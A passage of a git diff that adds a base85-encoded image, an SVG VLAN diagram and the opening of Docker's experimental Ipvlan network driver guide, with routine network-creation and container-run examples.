zT75GA0`q&jS{8`>?$yfIAARt_C!aKDUlBoqC%bNC>>;x4<~K0YSr^IqED+Li;f5Ol z3A3&MVpG}oGLSExZGHNIkUx1dE52g#XmOS(*jX{`lF}2cOWjKKxU1nY=>CR1uYwb6zAMumQx;_b5*pJs&wds_n&CG79P# z#2NrHTm}?6)9k4PkdL2z@%Yn^zFt{*wYvJ`$@>p(?I9rY+ZT@>eFbSsGqcxqrN3F( z36L<9;0J`lW_Fr@%#DGNhDxwBi6LVk-K#+UvbBXvk$gd~Wlbfa6gqm)(E&uc10egT z?K!A#^$RFA9s(9y4ItufqLy5ZiTuU)YUPN z(Tu@3R;0KLC$gZF{G3_wIwccQ3stC)>FH|V zm{^%Seh455eV>hENC`l=!&%|%j^9y4^&X>{_mSl2v?gYl|oB*=6h6DY%X1=nGj`7cORAkJ# zYgnl z7zo2trAW0DkBO3|8Bqo{Z;`q%gr!qf!~>Ltr7K-Jbm)SF#D>HR@Bl2(g-75WcnZ$G z94F$afs$kBFU7XbiK^yHe2(>d%wom}BpktyAqprC0>V;p8wh`tTR}}9;Z2QQaF8vl zxf-uYf)yNHK-?1$5)f8Kt0(N8gDRsQtTO7PkQF(Hx`5dKi9pCv%?3udK4SfDHK>Fv z;wHnTX&T0q_&S){^%+=WF=V#>Rw9sT>!u!-)O{en{BR50o~RGRK0^q^^Q^lPMG=fO zCr~$s=ww^;0%7-idwq}*F)gmR$wprg#d?5rs(;8*aV%`M_JPQVa|i-a2&7wVw&sY} zAb=F}#6Z+QZ^+RAVf|#t`jz_~i~k(5HgCfFLxN>WK=i5f{*cM8_yUq%*c`BTqeojv z0fkMLf2R3(8VU$Y=Z~^LlErMEB9M_jTf-bljt9($FRKcHz4jrv3cF5^FIRd zc&KoCzDOcL9>KE62}m42JUh3Jgxu_F2hS|#5H-@peQjS63Ax3tyIEchnA9;9DSh(- zeuP9uQM9_+rdM3UL}GU2;g|Nm4Vm>1~y>j+F5KREP)hbv4j0_ z=wV@Dt9Bxs2uWdc+<_q6D-6DYwJ%_6ZR-n|!($h(n!xU_U;f4BgCq?R*uPy?Y4!S& zj)6H&4&?Tx=SWD$W~e1gb+1+N{q}ksmv^U3gy6cjN_X`3^l>qY`>*E)31MNjqfM9V z&*|!H43DetO^m>AV*~t<&b~qBMu?YnBgR~zC4^9z{<_A-7+aY*pUq<{6uE*;%&Iw%mqS_!0M{XjQO3Iab6mO`UW9Gin(82%viNy zAO^#e=<{w4u28|_BPyRw#_D5x81+L#^ME{l*fhU=XhS_k=*uUSA<6ncp{cP=xwOUS{XID0*xVWbv{e#=4MrLehV~Ljs9U zUV*4wf$+Yc7KrfhM}e08m_eR>WXr<%Kp;sHX0$-?r#d6?MO+0!17^#5yE%~Y{AVC? 
zUm*MpY3(-5kKr>!0)&m9AwS9kurg(5h{(kZ0XsvkBX+-O%MuV;LdWgsvm0s?`lsVPh?G3rC6t(_!5^`R3Ufk_8|vwE}x64Ip}nv(EgWzYsG z+5tJMLKA*Tcy5gE4>9G&v6=)%AukWYu>=JNFb(Oq=i#S%r7oaVO6xgw&kooOg@9iz zd}W&kMF7_#2aS!uDLiOW>xeZqg`E;d>3l7=J%*;-*R?>F;VQByUzbJEOs)jZ1$AX5 zEPdwNMUb8Dd?QsWSJ$ zJJZMocMfvHHhsc3w!_zDdDH_fqs_`ii3R{IXUy6*5XJGasWRQcA%U^zqo2X>C) zsEb_+#fx~*42BHm3LRV!QK59umeFIuWUw|vhd72V!6anPs2+baB~CKo_nKhyj1KOR}u+uP`0v`Hba8K7vA+E+5KFrEc)eQlhrTxZ6 zR#N}zyd3~yZ85|^gr8pce*;qS_GZf0Pf!JwW>~S3uNszq{ib2je#35_J@by z9GDG9m<-M;fjk$%Cl@>3CP12p>Ao!x1_3XZ3rz-GElQq?0Qr90d=yA=Wa%sKj}F7q zJihYFqAF&;mc-Ec^5*&K9;xYmf3hJEZzq+I@h}a@?Y6UGBXe{T#6W;h69ym*1Kohy z3;-s#kWbPX(^E^N3Z!&o`Fexc)vKuMGStCLR%G&o03Jqk1Jx!#ylF!T(c3#qqynUT zWbNJexSfTO>k^uhBN(ylVOFhVYX9SGpOn7wK_q??`#P?4w&03XisE*H*qa{a4pcJtn z8Uy1#0VKhTx z2w7K=>YXv&Q^zw466DoTzpB@Iez(0t8rSiDQPn03bg8z1_l*E3q$^f zuJtl72p9oTAs_@)nUER=2`CC2kkILpnpKWvGIBL+&kH8_BzL{)-vm#Mn8SuH)BgOsx9J8FSKnpb*HVkvZ>aS$m`Zx zUs}Bqy36cst+nCNiulf@`-iT-_zrIPFe3ymVf*MdJREx^=0jTDSlh&{wrpJl8kiZt zS`lkwDqXD17+YbA`t~26gOQmFcJ2wGam#oWh}^dQ(CThsQ5QzL z-zHBQ{{R!e|I0US^t-Pi7hkY5FNC;#x^=?!ihGFHRz%ZU$C}l_b#mPeMw{3+FO2G> z?yoH`txUL@h_`DXM7ELs^s}GLq%4S#gAkNj9#Vd7S#4CyY;tX6Aln9PGu^DUEXFpM z8rOwPkhHfiX(-lF`wX(y84-dK0}@T0Kkt=D9WqGvXb#v3Mbfejz@lacXV|`Z$z!IqJ zCkt_ZV+Ftx%PR{o)epg-P1h)$!GpEUbW)GpvMRS$RMTA{0F%Ff>#QHIhQI-PBm^SF z(c>bE+bOk7n`jm4u{LckJEnDCP04%twSgTITV4mMxK$IqD_%z5J3;_fC4Yt~`o{tno_9=|xPZQH?g-IACfLXBf|KJKa^}0eKR8(kv@M=U zZHyo0@IxhGAYz@FRm6g93^Orkor%n=>_(YY&vlQygAfh-D0G)MoRqTmsmJIIuZ>}G z&$DLGxyhqOWeLj0!I-?tSZKhB=}9^vd{;;&c=QA&h_ey0r%@Ie-EisZL`G#_MLG1W zk$F#&K8%bJ!3bR%qE(KR!T6pK#?x=ylzrD8cVg&->;nWEB0eIR_>@qL2{h!!?+DgW zSi;lrWIplG=dl&!6(J~qvDWEA9E>82e2fV3C?OR2jzAoYhOi+NBV}MMs_cloSA<9y zYyE7ls2^YyReKo4*ufluAO|DFcU&Z`#{p(~fZZ3uKK_rp?c#BSJX#IeZ@})@z`Ngf z4VL?d+l5FxirqZKdsT@1?vu~nIVEM?haG6gFgFjum?aqB7s5FE_6dBw!n}|J48IPx z-;glbfFI}|enklJKmO`{xG3x7QP%l)ayS-p+z8?bxuXg14lzXT@5W;xFP=Y#%jD*Z z`s-i>VB~+n2rTXkLE@L+K7-r*&DRj`xM75LFuH$)@6agrj)dHN{q>h{f4~b;*5yKo 
zD$BCn2&NJQkK)#DkayG$Mcs#=nOQ>}d4Ld-v_MO$M)lNX{ML@-bucGHAfW;FTgY0o z5pvY%;9z~&G_G3EN|!wtKWYadsH*ck`Uqx-kC?LNh1539b6>6Mj1yFq(T%})Mu<|P z{`EUYHRLE|9W}JFd7d*l)hk43sBL6@G9yF%37Gi3@<4s%0On`_s~iji3={7}A&|38q}?Vd-wb!0}!%sgZV z+r0|jGtnNlTVP6n=AI!lLS||Rz6T?BVPp?;Yj#V7PZjd0H3W0nV^Rf~o04&s`54v_ zHButd0Amluc|zcMrgBDb7>wkS2;p(ykxFF(UIkT|fcPVF2MAyTh{yv>!laRTLotyF zeuI$NQ5F(`AVlU29MCXe7+~Apgxd|+F^Ov8ydfCL9^)AyXO6O#c(svBx7`GX>7u6|jY|hei>38Q=$I%hfeGuXtIo&g*N_WO z13DH$kELQxwNY?h2*F{rKTopQqi*YCyhCe()F#LUqs~3}6 zjwl3}6QXVPo*4?W2H)4q^UGeRE!tP=+(ymUfF5W)#pAOs_bBTtn&tSIemaA;j$wgb|m^7D4p=tz$bO{@O+4zae4Wbc{Z{sAHbK z6oPmKLR`<}2M~S1LCD&0SsGDx>#m`1H9}rn)IrE_W$JEZ8=is?Hj=6^aEt~wRBDP? zvp?=qmSAWAAr(`aJ@1D1v?@j>9aG%o!&S+KvRp2vHwZbJ7|suS9~dDXDlO*qqF7Z$ z&$H!*uR0Heph_=_BrY14>H`~>izRf=9c}pBl=ablAzT#;TeXI(#mH6XYN|nQ1BR}T zfH`#RgKeP?BTMlmLQ+@Mp+@?xMQqvgxJ%)P>fHvIs$8YZA|LFi0k$H%?)+0z*5ghL zNz5<_rSw86h-f^*8XPtPlS(zTl9;ImF;+E=l(&>HLC&oqKe{6Xvj*cZmOfCaXnX)d zlMFzOA2!vN*@Q8`1i%=%WMYT`fJv+bj~n7Q0{(|WH3WLAU;_j&-5Im2X&g+91kVV0 z+*3&p6GOV2BjMdNcKeu;m+Poo5WJs0kq6AwH;0KK-odD&Y=Ou%x`!Q@TNpimV)(~{ zkS)NYcVN5TY+Y>+S(YS@f2L{P0tT+*V)Ga9HQ_LfqN!?qusrX(X*r5dtS$ zD|9goskbZyzBVK$mu@zSBX!Cs3ob`^io;7`45Be(^FrWq1VJu^RZ;qug}|km2_nS9 z4~-5=(GcY-n~xBev;H0s5>fw;k1R0td%A}*5!9TEjHxNzhG#gHk4F7+NdB$EZ13&ja^DP#;8x|Kqq z(Em`s%Tbk(_}V+{XCnkgJX=rC_wIC`E@px&4?zNMP@#nCjVNTpJkiL!<~T*A+aXZo zTDQ4383P$7Aae->nKA}R zGRJ5y&`bMQJD<)1$w-qVYjp@bvU@vJ#1q2>NE;;^vC>XK;F0s~vmi3)0rejf62LN+#(>R&cVij^XA*hZv8HL|%HM%_YMOKwh~8fk!^_ybUBvsMb!0K$ZU1B!sM$ zQDVZc>I7MB6)s?kqZ^bEQ$Hk$xxK~7KL~;j`)NL4-eeSHG02vtEL-rDrg!Cl29Y6Y z3$>=f#cmZtp3^u4?1T%1U#B4Gj=cX$2O)H{HjTTaOB!|iO0V`yHi$z|m>8K`K~`Jz z*?DAlUa7k9MXfX!Cj8Qef^2rNw^QU=2a#3xWDRo(g3I~)9akp-WWwk{8s-)x{GNJ; z7jO4I+;V?ZNQgt3P`5*{EaAboo5KLI`=rerg4hRPq|?tKWLhXihAoSz-!ve1?0w83 zSfgn4S`c3-gc9?uizOYyPLW?R%vnhGE%bam8jqg29fD^y={AZpZ?Ys83q78iY;EfS?M|BRfGh@G_UC1g zb??mX*$>Uef=cyUd9hOwi>+zg%0lFk>Mu#GP<7-%*>V85yq+h!)3?l=)M zUnEu4drySu%X^c*jvXBTIP!X7I)kV8>bcx*y|Ul$=j9or{J6B^l3}BoBh?N1 
zt9^qm(qrJcEB#KFEHc=9ulg(xWDiAsoK|E$eo}pH_IQTB>@C?yk ze9&ac!W?gALf5vD^?Dgt@O%Ew=Kj>_ zO>74y+j#Hz!c+H`KF#cV5Td?V%ZixE7NgmS^KdhwG~BWUQijH6nvbY8W>vycdX1ph zqq9^x{>eEVpNXKHjnHqIUz#Dnqi0Ber3HcRSysQ>agi-SfShq(23J;p)s+TM7~J6K zr7IfkU=0Bwm%GV(+OyX*40&evc*y6wFxzpybGR_oI80V%uicPZg@hE()JY=_&xzFR z)QY1K-IDa=JU)qrxbDeVW(b19u_=Q_JUUOU^9DZ|BB?e*nlETh(lNBZ;3b&lm#nr6 zyj%rVNB7+BAn0EN?u95#fxFV&7lQ!|RtE;J?TWMs^uq~x5>iSn>tk*0Pi=lVv3gS{ z$-;Fq-__>trqg)7LFgNA?*mgcNlk%Wj~ zHj9R%go2QqE$Ei9Fkd7maWsSX7bB$G?_$EO1(r8JJsJ$IK7fe25Bp;fvYgt}HQj|LYoFf|;(X-udAOS-bH4{g;eWM_`x8=CbO^mhZDNg> zUW1TE68^w8`37Bn=U-00Pr8H#cB%uRhc6>QOVRGm)%qH}mElQSux#K+$qDs~Q8X{_z zHI7qgcNm)NhL3a3&s#K3>6ma3LboDC2!`?4ibph$sdX&~X`~3Updn!%^6SPIY6wsc zA)05k2ikX1wN*j{uG^NPz7i!1e*J^nx2)CSgcx;BIj3P}gcQ;}-`!Aj4BngeEZ-3> ze`kRZKDXBvME$^n2j`JaDZQ1L%ML?ZdZNY)G5TW^X zqjd(6Z;j(TV&aSl8dB0s9Z*Xi6+i8j%~3nhG_BojN_gRdrG7`F!ljv6*KP=*?s&k!OrWbXkZ`r@c2-+M7| z0HTow*;ft~rx-T3Z%cWWr5}|EP5YD~PygoF1y@o6Ewua29N5a8**Mogqg8ITpQ_4ax5aWzDqeeq4nORplYL5Ny2IGsriREA`R@A?7bn)*U!R^HfBQT2&7NOQ zga(uVsXNZA+Cu z*T<*LW3?V8zFG6qcP6EzNZoOkul{h_#5Gd?j)c|QzkT~vIrtxKcWA>f5JLeJnVsZP zOP20v3$s9FDd3lQh3*iAhX&sQ9U;SYfmTtXD1mMK;E_+hb?zm0wD|oPu>RF>-_(tOV={cR5ofFR&WGK(>9ql*aQ&^`|7krmK=~9 zzE}Jwn4&B+(lrB(`22bx$yqI=jt&87kcSmd$Y@N~mjiHg$=)uz!j18PPf7EDL4FL7 z?;xH-^6|!i#LM30#2`6+Bk}KmKteEw_@^w|CFKYJI6)D9UYZlwJYy%K&XXIijOzhz zuDcdc;6^~GvPZ7S(JpCprWz~1X=$!4u+*?BR&Lk@+3pI8i2Ceg9#Je(dpyIo6x7dyNFsWU2^M(!qFa4!F$RI8R4F81K5n#3W(33H$Gc0l@`T)6@VFgfUA5jFD05 zBa8^65s)0M^&&c_MTlb*!Hl=+Qw|Y8T~bxO8{)A%C}L+;h>ek?#p3(tA)v#H>5k<^ zn2fC8W>uk>AfPxDx0rtMb%c1-PFr0B6UPghW%U`8nPU9AUq?SFsel4+o$*Kvki>As zT$dwkJ|A#wJ^>F}cPvX)hjulh7{{KNF?Nk~F{VroHOt>IB3=Z77u64xO^Yf6jFPnw zYhH*8)ldWiKH_YEApi+9XvoN6?AYjr#X;^_ZYv}=3kY3&x<4FH4kOmKv@W#; zgVBQP%0xUg!xx*`2pg^~QvwYxJnizt6$rk2Isn>`T^ZSmfMr<`=u#)bjL68Y&11us zPr8WbIeOo7+vP4bfJea({^G6Qbg`_+*kF1X+3uVbB98u4orgP*i~5$E)BTKVa~Z|O zxb4npVcjlwF~mymyED2Ej%08I5Nx>wH>{&csFatY;%teBubvcMj z42_vIO7LE$RBu-RtNZ?Y+}r$-g7d_0!-y6dW@Mqf&xM{>GqUQ)t|^Qw1138Cr7nBt<`c&eqU 
zs^vqzn3rGdZ)JBw)Y2YP;JGzR>xCcJ^dWOIpd6j+-Rog`l+{k%lBBzwsaHRa(;nOpJM5>qO^kx&{z@%+d3;;QbF;HfWwmQjb5f!b4r^WwdO^Z|G9D zotCuhcN7=0roL;Gy5c=+&5AH`(%=}N>p@cod7hx=Ys)$~$__6obGP5`-#j3aPn**1 zZL@yg402|$>2>b;8c?4ZQZZ+ga?{ZYxvn8B04_rMdS%zYZ_75CN}Fc_cQM zgSO=VuE{f2^ilUIYUzWb#!NrphOrgy||^s6Hazo4yjHXFQO zQ`J*{Q>B!H3<=~$Hu`7=KQ4I}nq;M({4fv^B^)j7Lz2_EB_YH#Ow+1sJtocQJbOplT{AlSKTSMw!3Ob=ev4#e|xi0NF` zvmoeJ^y8hkJ^Z5l7YGPGJB?_wb5VYCygYmxiOrgIKnQX`*8*LDa9r(ULQ6Y*PSYP7 zr4{k}A0F!u3tC$0aKH7$bk@_Al;Pi-5Lrtiy%JUL*}y4 z*;?N@^zPrgkXG71bd8KmNYfjLn0}=P;$fG5Om_z2$yUJ%f8TZPblYXWwFe8>YV7j@ z;qkf^wF-N|-@49W^}jx}(zE%&F9+vUx40~vd=S(9brrAcAtH`CcyVF|6v1A`8|7CI zcJN(2XfN0D{DPiISC(#5LKv@^e%0tXOTDHSyeM_WhDz}lTHjswf-^n3tG#*4gG!*TFn)sLmbB==mQtw^)rZX{Ni%R{ij)U-IOdc~AEnor^t> zO0Q7*w0?XnJ$AIy5TQlWf1(AAZfkkyK^XCG8+g5^?K-8$PgbJu%MnKHmu*P4I77aB zf8#v_FY1ycJw^+fBn`th5IrN^Z%g}SNm>bODu+06S&GDl6tzl{WCh!LN2)a6Nmq?7 zMFrKTJX+Kun$z~Rt+X$e2awYR?O3Z6)$pzwZd&{1Rp}Y#(TwDIQWbsbE$Q7EwcLA@ z4nL}LIbY5<(|#*mY3oC+#}N+Cck;T<9=>&L1)h_mJZ+Y|@?|@n*HkC1YtBrXONm4EyG^)X(dz2moFPz*g471s}aJt z)R($f=ta$PK7Gj%yzoP1QPTAupOYlB`$?DYz{2FIW`0`@6$d;j<#QVlhH1J-nu`$zj4#AERtcrQE(WyQ*|C=Cshxz z;$qu%QYitu3SssX_7~!el5(k0Tva%bmhFg;jLqJ(9h)P>o>hn~7>Zz|d}Lqw*s)PY z;XvGW(g6mkdcCgjG_$&@$i_uQ$k@bCcxN`n!wvLs`;p?Zw|3*=%56gryv(i&)Rqy- ztX2dH{K&BR_G$<|6CT*HUBTrMLlqIjju1y&q4c;|&y@QY_4qhLzygt7>^!RQvW#%% zQANfa8S7#Ofh|NGT(C)FdsQKhLNX}@R-(NcQ5Zl?Kpznfrd+QG*eF(P*-6QWL+#l* zm|V5pjLQQ&!bU*CuFJCQI_}L+>X=dtxZ%cL*;tF=gX12;$$K>cF#>mrp~J*6MIaTA zvKAT`W>j(@VFba9&CELigpFxa3Wg|+1yI6AFvj#^n>cpIw3+b{CNzcx4URR)gqMgS zjwcEH*Z^+nfk@kCB;r^yu@LK{v9XC89Mj1x(8MSuD1nY)hz(;H7^~rtV+2U}M4dqc z5jG8;Ppp9L__}#S6BFg*zaF}|+DW|f2~IK$>KHr#8H2~d8j$>@>2sinm8hz60QGx_7jT8T@< zWKd#xN+ul+k+>uUIycOa>13x@GBQFt;>bK1OT`b|2$Ud@u>#4+EEvLcehKG~hU2sX zaUiGGSQppbM0wi$p+ChofsPOnfW8(rcG8p)y{2q1pi`15OlhV;t_3)8FakJ<0K(VZ zu;~&c$RxwZ=>-l5EC(VP0Z2oD4=fG^-pvC-SPmv%9V~}&l9d=}Rv?IT)tL41ND5)Q zf?^ep#}@%*=?vo-+kFm;h2s$6Nor5NY?$F#4hC`aWrTUu?(YKV)BM>2|AXElX-UBI%fzz(P&?7DWH+{zAk0^+=^q=csanP&hp 
zwqk25VJ4N55wcg~mj{7`#R1cXttgNQFl1u}PO!nIOE?60!dB_6{Pnj*7h!oUN*`FV z(=dGshA_^g>h!@bwqugQrtFf|a<^y`%qC5pi#oq3^%;{8&aegK3gDDDDdMon8O6FS z6JnGsp*&!27?YsF4?VHHcG;3%5eUy+DSL@qrRLgmYFZQ^spgy z%)yt|8@*D57t@ZE$9F&`LU>Vyk$gB`L4zdY_(1x^z&^N@a6l^#GBk7KrKj@`^SndMF2GD|415J;%g(X9f+ca~j=ESFPuWv`SV8N9C5Z0b!(@ z9Wc#~x&f5q2tNBE#SV~*PoL2n2LvzZQFB#E^y5zb-3LU7aj#xX56)m6^7EH19fG=Uh0S!ZG^EQ9U%U=#p3<<|dO$cjrxMiK z>b@R`KW*H%`1WvJg|*X$c6qmGMF=vaFE*b4zCzAA6%F2zoqX`gN<9M36Fm^iCF|>F;I~fLlr}g*nkU_M_PN-w%3f(45Iuqn z+MqZ6cj`ROSyX&c>x(bub_U|T1M%qD*`LYGkj`A5?L=Sg_&Dd)f0-4}m+gedN-{rcU8mvc7XRC+xSh?HccMd8{Jpo% zYFiMHLN{D|jZZ$DOJ247^>-Wuqgd8n-yQI1Vv5lLqH(g-uMVT(ft>%S96*g6yKnqzZG-kLnxIz2b*^wAi%5C z%)D2P5c+aYl@4%I`i@d@ea$Lod$iOmtYs$|5{U)#8NKNq!s^LzSUr3b7S#O%dJjqv z&(2n-=$*MYm05X~>_b;-^mT>3}DA@$=$t9FT9%J->Os^yg4a4`$40 z5i+DtYbD)pl`5FN-o?2cMe{L_&(;Rb@}Te;fBbATo(^zajcIDZ(ux7KG02cSS}3)3 z5T$dLklD1Ny@z56G9+BA&JJ#MWUWsh+=Hw_Tx%HuvhjP5oOdce2_H?RI>-%L+ACHh z`_R&sw~V8=7kTdI@5IgJ^24SUXGn*Z15vBgRJ`bgh|osXWOdoMwqlpeAO*H&-h2ZUgz$7-dKKcP z4z6_RQWOh&TMZR`DX9>Ug|$@iDGU#8^b_tn1SEciwr!sMVni|m64=KOpv$O?Eepx0 zz++hvsI15WZ@2;@P<#%F6|e)^29tLMf?URfO+AnWjAU1kc|j%^cpR2NMkcb$6Ov(W z44GtH0RRBOtYPLLwvLV1499FDLynL7g6)pLH5)^YjWFmS3GfIw%P20#MA;!h23H6% zn8;ujfGacW&|`B>U}wfZM`1w7n4oH~IRGQZ25_ARDQ6D?0yMZmBR8rBoO!;>>&k9p~*R9^rlY`hu8=1$p;28iH8sYDPUmM!e{(rC5pL;cFYDn z*1#TNMU)XE6R}7l8vEnO*iB-MFcHGV;$&imv;dDI<-lNT@UeyG1X$%)cCYFo!pe9``VxW|5_GAWXZHCAqhIxjC$9KOUX4J zOgdv?8k7+^k{byTOh$uap^4ei-*{;1o12J_`BOc(rXmPW&?L&&VNVzAI?Sm-)=p?{ z!u&tAvx!PvmAGytZl;!!YvOa-Pe_8OBIW*9EbMrTEGUr5^Hzux(A1|L7zLUFaV};$ zmMr*l2n?v@nKjw3*P-+n5Cc@D^DJU}z~t zJ1`0?4FT-iAr1f_2td)o#{F+>V$PyTF}xS4e~d(w-H&0(j3&$tSqIkk0iiCo-SqvCT7M#14aQe6999SUnert*{%Qp N002ovPDHLkV1f$s#LfT! 
literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg new file mode 100644 index 0000000000..96cd21d52f --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg @@ -0,0 +1 @@ +DockerHost:Frontend,Backend &CreditCardAppTiersareIsolatedbutcanstillcommunicateinsideinterfaceoranyotherDockerhostsusingtheparentVLANID802.1QTrunk -canbeasingleEthernetlinkorMultipleBondedEthernetlinksInterfaceeth0Container(s)Eth010.1.20.0/24Parent:eth0.20VLANID:20CreditCardsBackendContainer(s)Eth010.1.30.0/24Container(s)Eth010.1.10.0/24FrontendGateway10.1.20.1andothercontainersonthesameVLAN/subnetGateway10.1.10.1andothercontainersonthesameVLAN/subnetGateway10.1.30.1andothercontainersonthesameVLAN/subnet:Parenteth0.10VLANID:10Parent:eth0.30VLAN:30NetworkotherDockerHosts \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/vlan-networks.md b/vendor/github.com/docker/docker/experimental/vlan-networks.md new file mode 100644 index 0000000000..caec6d6c6b --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/vlan-networks.md @@ -0,0 +1,471 @@ +# Ipvlan Network Driver + +### Getting Started + +The Ipvlan driver is currently in experimental mode in order to incubate Docker users use cases and vet the implementation to ensure a hardened, production ready driver in a future release. Libnetwork now gives users total control over both IPv4 and IPv6 addressing. The VLAN driver builds on top of that in giving operators complete control of layer 2 VLAN tagging and even Ipvlan L3 routing for users interested in underlay network integration. For overlay deployments that abstract away physical constraints see the [multi-host overlay ](https://docs.docker.com/engine/userguide/networking/get-started-overlay/) driver. + +Ipvlan is a new twist on the tried and true network virtualization technique. 
The Linux implementations are extremely lightweight because rather than using the traditional Linux bridge for isolation, they are simply associated to a Linux Ethernet interface or sub-interface to enforce separation between networks and connectivity to the physical network. + +Ipvlan offers a number of unique features and plenty of room for further innovations with the various modes. Two high level advantages of these approaches are, the positive performance implications of bypassing the Linux bridge and the simplicity of having less moving parts. Removing the bridge that traditionally resides in between the Docker host NIC and container interface leaves a very simple setup consisting of container interfaces, attached directly to the Docker host interface. This result is easy access for external facing services as there is no port mappings in these scenarios. + +### Pre-Requisites + +- The examples on this page are all single host and setup using Docker experimental builds that can be installed with the following instructions: [Install Docker experimental](https://github.com/docker/docker/tree/master/experimental) + +- All of the examples can be performed on a single host running Docker. Any examples using a sub-interface like `eth0.10` can be replaced with `eth0` or any other valid parent interface on the Docker host. Sub-interfaces with a `.` are created on the fly. `-o parent` interfaces can also be left out of the `docker network create` all together and the driver will create a `dummy` interface that will enable local host connectivity to perform the examples. + +- Kernel requirements: + + - To check your current kernel version, use `uname -r` to display your kernel version + - Ipvlan Linux kernel v4.2+ (support for earlier kernels exists but is buggy) + +### Ipvlan L2 Mode Example Usage + +The ipvlan `L2` mode example is like the following image. The driver is specified with `-d driver_name` option. In this case `-d ipvlan`. 
+ +![Simple Ipvlan L2 Mode Example](images/ipvlan_l2_simple.png) + +The parent interface in the next example `-o parent=eth0` is configured as followed: + +``` +ip addr show eth0 +3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 + inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 +``` + +Use the network from the host's interface as the `--subnet` in the `docker network create`. The container will be attached to the same network as the host interface as set via the `-o parent=` option. + +Create the ipvlan network and run a container attaching to it: + +``` +# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) +docker network create -d ipvlan \ + --subnet=192.168.1.0/24 \ + --gateway=192.168.1.1 \ + -o ipvlan_mode=l2 \ + -o parent=eth0 db_net + +# Start a container on the db_net network +docker run --net=db_net -it --rm alpine /bin/sh + +# NOTE: the containers can NOT ping the underlying host interfaces as +# they are intentionally filtered by Linux for additional isolation. +``` + +The default mode for Ipvlan is `l2`. If `-o ipvlan_mode=` are left unspecified, the default mode will be used. Similarly, if the `--gateway` is left empty, the first usable address on the network will be set as the gateway. For example, if the subnet provided in the network create is `--subnet=192.168.1.0/24` then the gateway the container receives is `192.168.1.1`. + +To help understand how this mode interacts with other hosts, the following figure shows the same layer 2 segment between two Docker hosts that applies to and Ipvlan L2 mode. + +![Multiple Ipvlan Hosts](images/macvlan-bridge-ipvlan-l2.png) + +The following will create the exact same network as the network `db_net` created prior, with the driver defaults for `--gateway=192.168.1.1` and `-o ipvlan_mode=l2`. 
+ +``` +# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) +docker network create -d ipvlan \ + --subnet=192.168.1.0/24 \ + -o parent=eth0 db_net_ipv + +# Start a container with an explicit name in daemon mode +docker run --net=db_net_ipv --name=ipv1 -itd alpine /bin/sh + +# Start a second container and ping using the container name +# to see the docker included name resolution functionality +docker run --net=db_net_ipv --name=ipv2 -it --rm alpine /bin/sh +ping -c 4 ipv1 + +# NOTE: the containers can NOT ping the underlying host interfaces as +# they are intentionally filtered by Linux for additional isolation. +``` + +The drivers also support the `--internal` flag that will completely isolate containers on a network from any communications external to that network. Since network isolation is tightly coupled to the network's parent interface the result of leaving the `-o parent=` option off of a network create is the exact same as the `--internal` option. If the parent interface is not specified or the `--internal` flag is used, a netlink type `dummy` parent interface is created for the user and used as the parent interface effectively isolating the network completely. 
+ +The following two `docker network create` examples result in identical networks that you can attach container to: + +``` +# Empty '-o parent=' creates an isolated network +docker network create -d ipvlan \ + --subnet=192.168.10.0/24 isolated1 + +# Explicit '--internal' flag is the same: +docker network create -d ipvlan \ + --subnet=192.168.11.0/24 --internal isolated2 + +# Even the '--subnet=' can be left empty and the default +# IPAM subnet of 172.18.0.0/16 will be assigned +docker network create -d ipvlan isolated3 + +docker run --net=isolated1 --name=cid1 -it --rm alpine /bin/sh +docker run --net=isolated2 --name=cid2 -it --rm alpine /bin/sh +docker run --net=isolated3 --name=cid3 -it --rm alpine /bin/sh + +# To attach to any use `docker exec` and start a shell +docker exec -it cid1 /bin/sh +docker exec -it cid2 /bin/sh +docker exec -it cid3 /bin/sh +``` + +### Ipvlan 802.1q Trunk L2 Mode Example Usage + +Architecturally, Ipvlan L2 mode trunking is the same as Macvlan with regard to gateways and L2 path isolation. There are nuances that can be advantageous for CAM table pressure in ToR switches, one MAC per port and MAC exhaustion on a host's parent NIC to name a few. The 802.1q trunk scenario looks the same. Both modes adhere to tagging standards and have seamless integration with the physical network for underlay integration and hardware vendor plugin integrations. + +Hosts on the same VLAN are typically on the same subnet and almost always are grouped together based on their security policy. In most scenarios, a multi-tier application is tiered into different subnets because the security profile of each process requires some form of isolation. For example, hosting your credit card processing on the same virtual network as the frontend webserver would be a regulatory compliance issue, along with circumventing the long standing best practice of layered defense in depth architectures. 
VLANs, or the equivalent VNI (Virtual Network Identifier) when using the Overlay driver, are the first step in isolating tenant traffic. + +![Docker VLANs in Depth](images/vlans-deeper-look.png) + +The Linux sub-interface tagged with a vlan can either already exist or will be created when you call a `docker network create`. `docker network rm` will delete the sub-interface. Parent interfaces such as `eth0` are not deleted, only sub-interfaces with a netlink parent index > 0. + +For the driver to add/delete the vlan sub-interfaces the format needs to be `interface_name.vlan_tag`. Other sub-interface naming can be used as the specified parent, but the link will not be deleted automatically when `docker network rm` is invoked. + +The option to use either existing parent vlan sub-interfaces or let Docker manage them enables the user to either completely manage the Linux interfaces and networking or let Docker create and delete the Vlan parent sub-interfaces (netlink `ip link`) with no effort from the user. + +For example: `eth0.10` to denote a sub-interface of `eth0` tagged with vlan id `10`. The equivalent `ip link` command would be `ip link add link eth0 name eth0.10 type vlan id 10`. + +The example creates the vlan tagged networks and then starts two containers to test connectivity between containers. Different Vlans cannot ping one another without a router routing between the two networks. The default namespace is not reachable per ipvlan design in order to isolate container namespaces from the underlying host. + +**Vlan ID 20** + +In the first network tagged and isolated by the Docker host, `eth0.20` is the parent interface tagged with vlan id `20` specified with `-o parent=eth0.20`. Other naming formats can be used, but the links need to be added and deleted manually using `ip link` or Linux configuration files. As long as the `-o parent` exists anything can be used if compliant with Linux netlink. 
